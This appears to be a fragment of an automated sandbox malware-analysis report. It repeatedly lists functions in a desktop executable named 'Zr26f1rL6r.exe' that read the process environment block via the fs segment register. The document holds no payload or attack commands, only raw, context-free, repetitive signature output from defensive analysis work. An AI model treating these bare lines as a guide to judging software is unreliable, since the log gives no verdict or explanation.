        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCE3F mov eax, dword ptr fs:[00000030h]10_2_1E8FCE3F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2E32 mov eax, dword ptr fs:[00000030h]10_2_1E8C2E32
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]10_2_1E988E26
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]10_2_1E988E26
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]10_2_1E988E26
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h]10_2_1E988E26
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]10_2_1E93DE50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]10_2_1E93DE50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93DE50 mov ecx, dword ptr fs:[00000030h]10_2_1E93DE50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]10_2_1E93DE50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h]10_2_1E93DE50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EEE48 mov eax, dword ptr fs:[00000030h]10_2_1E8EEE48
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BFE40 mov eax, dword ptr fs:[00000030h]10_2_1E8BFE40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8BAE40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8BAE40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h]10_2_1E8BAE40
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BDE45 mov eax, dword ptr fs:[00000030h]10_2_1E8BDE45
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BDE45 mov ecx, dword ptr fs:[00000030h]10_2_1E8BDE45
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]10_2_1E8BBE60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h]10_2_1E8BBE60
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97EE78 mov eax, dword ptr fs:[00000030h]10_2_1E97EE78
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h]10_2_1E970E6D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994E62 mov eax, dword ptr fs:[00000030h]10_2_1E994E62
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1E70 mov eax, dword ptr fs:[00000030h]10_2_1E8C1E70
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F7E71 mov eax, dword ptr fs:[00000030h]10_2_1E8F7E71
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCE70 mov eax, dword ptr fs:[00000030h]10_2_1E8FCE70
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov ecx, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h]10_2_1E8D0F90
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EBF93 mov eax, dword ptr fs:[00000030h]10_2_1E8EBF93
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]10_2_1E948F8B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]10_2_1E948F8B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h]10_2_1E948F8B
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1FAA mov eax, dword ptr fs:[00000030h]10_2_1E8C1FAA
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F8FBC mov eax, dword ptr fs:[00000030h]10_2_1E8F8FBC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C4FB6 mov eax, dword ptr fs:[00000030h]10_2_1E8C4FB6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]10_2_1E8ECFB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h]10_2_1E8ECFB0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97EFD3 mov eax, dword ptr fs:[00000030h]10_2_1E97EFD3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov ecx, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h]10_2_1E93FFDC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B9FD0 mov eax, dword ptr fs:[00000030h]10_2_1E8B9FD0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h]10_2_1E941FC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994FFF mov eax, dword ptr fs:[00000030h]10_2_1E994FFF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h]10_2_1E8D6FE0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8FFB mov eax, dword ptr fs:[00000030h]10_2_1E8E8FFB
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8FBF0C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8FBF0C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h]10_2_1E8FBF0C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994F1D mov eax, dword ptr fs:[00000030h]10_2_1E994F1D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]10_2_1E900F16
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]10_2_1E900F16
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]10_2_1E900F16
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E900F16 mov eax, dword ptr fs:[00000030h]10_2_1E900F16
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]10_2_1E8DCF00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DCF00 mov eax, dword ptr fs:[00000030h]10_2_1E8DCF00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]10_2_1E93FF03
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]10_2_1E93FF03
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FF03 mov eax, dword ptr fs:[00000030h]10_2_1E93FF03
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]10_2_1E948F3C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F3C mov eax, dword ptr fs:[00000030h]10_2_1E948F3C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]10_2_1E948F3C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E948F3C mov ecx, dword ptr fs:[00000030h]10_2_1E948F3C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8DDF36
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8DDF36
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8DDF36
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDF36 mov eax, dword ptr fs:[00000030h]10_2_1E8DDF36
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BFF30 mov edi, dword ptr fs:[00000030h]10_2_1E8BFF30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97AF50 mov ecx, dword ptr fs:[00000030h]10_2_1E97AF50
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97BF4D mov eax, dword ptr fs:[00000030h]10_2_1E97BF4D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E916F70 mov eax, dword ptr fs:[00000030h]10_2_1E916F70
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994F7C mov eax, dword ptr fs:[00000030h]10_2_1E994F7C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97EF66 mov eax, dword ptr fs:[00000030h]10_2_1E97EF66
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8BEF79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8BEF79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BEF79 mov eax, dword ptr fs:[00000030h]10_2_1E8BEF79
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BBF70 mov eax, dword ptr fs:[00000030h]10_2_1E8BBF70
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C1F70 mov eax, dword ptr fs:[00000030h]10_2_1E8C1F70
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAF72 mov eax, dword ptr fs:[00000030h]10_2_1E8EAF72
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97FC95 mov eax, dword ptr fs:[00000030h]10_2_1E97FC95
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C85
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C85
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C85
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C85
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7C85 mov eax, dword ptr fs:[00000030h]10_2_1E8B7C85
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E969C98 mov ecx, dword ptr fs:[00000030h]10_2_1E969C98
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]10_2_1E969C98
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]10_2_1E969C98
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E969C98 mov eax, dword ptr fs:[00000030h]10_2_1E969C98
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E943C80 mov ecx, dword ptr fs:[00000030h]10_2_1E943C80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]10_2_1E8C7C95
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C7C95 mov eax, dword ptr fs:[00000030h]10_2_1E8C7C95
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F9CCF mov eax, dword ptr fs:[00000030h]10_2_1E8F9CCF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]10_2_1E953CD4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]10_2_1E953CD4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E953CD4 mov ecx, dword ptr fs:[00000030h]10_2_1E953CD4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]10_2_1E953CD4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E953CD4 mov eax, dword ptr fs:[00000030h]10_2_1E953CD4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E945CD0 mov eax, dword ptr fs:[00000030h]10_2_1E945CD0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8CFCC9 mov eax, dword ptr fs:[00000030h]10_2_1E8CFCC9
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8B6CC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8B6CC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8B6CC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994CD2 mov eax, dword ptr fs:[00000030h]10_2_1E994CD2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F6CC0 mov eax, dword ptr fs:[00000030h]10_2_1E8F6CC0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]10_2_1E8E8CDF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8E8CDF mov eax, dword ptr fs:[00000030h]10_2_1E8E8CDF
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8DDCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8DDCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DDCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8DDCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCCD1 mov ecx, dword ptr fs:[00000030h]10_2_1E8FCCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8FCCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCCD1 mov eax, dword ptr fs:[00000030h]10_2_1E8FCCD1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93CCF0 mov ecx, dword ptr fs:[00000030h]10_2_1E93CCF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B7CF1 mov eax, dword ptr fs:[00000030h]10_2_1E8B7CF1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E940CEE mov eax, dword ptr fs:[00000030h]10_2_1E940CEE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]10_2_1E8C3CF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3CF0 mov eax, dword ptr fs:[00000030h]10_2_1E8C3CF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]10_2_1E8EECF3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EECF3 mov eax, dword ptr fs:[00000030h]10_2_1E8EECF3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E957CE8 mov eax, dword ptr fs:[00000030h]10_2_1E957CE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8F2C10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8F2C10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8F2C10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2C10 mov eax, dword ptr fs:[00000030h]10_2_1E8F2C10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E985C38 mov eax, dword ptr fs:[00000030h]10_2_1E985C38
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E985C38 mov ecx, dword ptr fs:[00000030h]10_2_1E985C38
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D3C20 mov eax, dword ptr fs:[00000030h]10_2_1E8D3C20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAC20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAC20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8DAC20 mov eax, dword ptr fs:[00000030h]10_2_1E8DAC20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E957C38 mov eax, dword ptr fs:[00000030h]10_2_1E957C38
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F4C3D mov eax, dword ptr fs:[00000030h]10_2_1E8F4C3D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8B8C3D mov eax, dword ptr fs:[00000030h]10_2_1E8B8C3D
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994C59 mov eax, dword ptr fs:[00000030h]10_2_1E994C59
